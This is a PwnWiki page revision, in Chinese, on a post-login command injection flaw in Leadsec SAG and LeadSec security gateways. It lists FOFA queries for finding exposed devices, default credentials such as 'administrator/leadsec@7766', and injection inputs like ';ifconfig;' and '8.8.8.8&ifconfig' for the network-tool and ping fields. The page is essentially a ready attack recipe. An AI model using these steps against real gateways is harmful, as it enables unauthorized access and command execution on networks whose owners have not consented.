Difference between revisions of "網禦星雲-安全網關SAG系列&LeadSec系列 後台命令執行漏洞/zh-cn"
From PwnWiki
(Created page with "网御星云-安全网关SAG系列&LeadSec系列 后台命令执行漏洞") |
(Created page with "==网御星云安全网关系列==") |
||
| Line 8: | Line 8: | ||
</pre> | </pre> | ||
| − | |||
==弱口令== | ==弱口令== | ||
| − | |||
<pre> | <pre> | ||
administrator | administrator | ||
| Line 16: | Line 14: | ||
</pre> | </pre> | ||
| − | |||
==漏洞利用== | ==漏洞利用== | ||
| − | + | 漏洞点位于: | |
| − | + | 网关管理->网络工具,在目的主机处填写: | |
| − | |||
| − | |||
| − | |||
<pre> | <pre> | ||
;ifconfig; | ;ifconfig; | ||
</pre> | </pre> | ||
| − | + | ==网御星云安全网关系列== | |
| − | = | ||
| − | |||
==FOFA== | ==FOFA== | ||
| Line 35: | Line 27: | ||
title="网御 安全网关" | title="网御 安全网关" | ||
</pre> | </pre> | ||
| − | |||
==弱口令== | ==弱口令== | ||
| − | |||
<pre> | <pre> | ||
administrator | administrator | ||
leadsec@7766 | leadsec@7766 | ||
</pre> | </pre> | ||
| − | |||
==漏洞利用== | ==漏洞利用== | ||
| − | + | 漏洞点位于: | |
| − | + | 状态监控->网络测试->ping处输入: | |
| − | |||
| − | |||
| − | |||
<pre> | <pre> | ||
8.8.8.8&ifconfig | 8.8.8.8&ifconfig | ||
</pre> | </pre> | ||
| − | + | ==参考== | |
| − | = | ||
| − | |||
https://mp.weixin.qq.com/s/YLgAZAO40PY8gX6Fh8D15w | https://mp.weixin.qq.com/s/YLgAZAO40PY8gX6Fh8D15w | ||
Latest revision as of 14:02, 9 June 2021
漏洞影响
网御星云安全网关SAG系列和LeadSec系列<=V3.1.3.1版本
FOFA
icon_hash="-948153991"
弱口令
administrator administrator
漏洞利用
漏洞点位于: 网关管理->网络工具,在目的主机处填写:
;ifconfig;
网御星云安全网关系列
FOFA
title="网御 安全网关"
弱口令
administrator leadsec@7766
漏洞利用
漏洞点位于: 状态监控->网络测试->ping处输入:
8.8.8.8&ifconfig